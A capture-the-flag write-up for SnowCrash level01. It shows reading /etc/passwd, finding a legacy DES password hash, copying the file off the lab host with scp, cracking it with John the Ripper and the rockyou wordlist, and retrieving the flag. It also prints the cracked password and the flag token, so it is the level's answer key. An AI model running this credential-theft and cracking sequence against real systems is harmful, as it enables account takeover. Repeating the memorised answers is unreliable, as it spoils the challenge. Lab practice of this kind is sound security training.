# user's hash password are on /etc/shadow and /etc/passwd
# /etc/passwd is readable:

level01@SnowCrash:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied
level01@SnowCrash:~$ cat /etc/passwd
...
flag00:x:3000:3000::/home/flag/flag00:/bin/bash
flag01:42hDRfypTqqnw:3001:3001::/home/flag/flag01:/bin/bash
flag02:x:3002:3002::/home/flag/flag02:/bin/bash
flag03:x:3003:3003::/home/flag/flag03:/bin/bash
flag04:x:3004:3004::/home/flag/flag04:/bin/bash
flag05:x:3005:3005::/home/flag/flag05:/bin/bash
flag06:x:3006:3006::/home/flag/flag06:/bin/bash
flag07:x:3007:3007::/home/flag/flag07:/bin/bash
flag08:x:3008:3008::/home/flag/flag08:/bin/bash
flag09:x:3009:3009::/home/flag/flag09:/bin/bash
flag10:x:3010:3010::/home/flag/flag10:/bin/bash
flag11:x:3011:3011::/home/flag/flag11:/bin/bash
flag12:x:3012:3012::/home/flag/flag12:/bin/bash
flag13:x:3013:3013::/home/flag/flag13:/bin/bash
flag14:x:3014:3014::/home/flag/flag14:/bin/bash

#this line contains a hash:
#flag01:42hDRfypTqqnw:3001:3001::/home/flag/flag01:/bin/bash
#We connect on the kali machine to use john tool and use scp to copy the file

scp -P 4242 level01@10.13.200.62:/etc/passwd /home/kali/Desktop/

#launch john wi th the rockYou list
john --wordlist=/usr/share/wordlists/rockyou.txt passwd

Using default input encoding: UTF-8
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 256/256 AVX2])
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
abcdefg          (flag01)     
1g 0:00:00:01 DONE (2024-01-19 16:41) 0.5681g/s 17454p/s 17454c/s 17454C/s 123456..shaner
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

#get flag
level01@SnowCrash:~$ su flag01
Password: 
Don't forget to launch getflag !
flag01@SnowCrash:~$ getflag
flag01@SnowCrash:~$ getflag
Check flag.Here is your token : f2av5il02puano7naaf6adaaf
